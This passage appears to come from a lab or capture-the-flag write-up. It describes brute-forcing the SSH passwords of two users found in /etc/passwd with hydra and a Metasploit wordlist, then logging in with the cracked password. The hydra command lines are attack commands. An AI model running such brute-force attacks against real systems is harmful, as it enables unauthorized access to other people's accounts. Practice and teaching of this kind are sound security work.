Other access methods
To learn more about how the system works, and possibly other vectors of exploits, I decided to further explore the web application.
Brute forcing SSH password
As we have seen previously, there are 2 users that stands out in the /etc/passwd file: joshua and charles. I attempted a password brute force attack on their SSH login with the wordlist from Metasploit /usr/share/wordlists/metasploit/unix_passwords.txt :
$ hydra -l joshua -P <wordlist> -t 6 ssh://<host>
$ hydra -l charles -P <wordlist> -t 6 ssh://<host>
I found the password 123456 for both usernames joshua and charles. We can now SSH with the usernames and gain a remote shell:
$ ssh <user>@<host>Last updated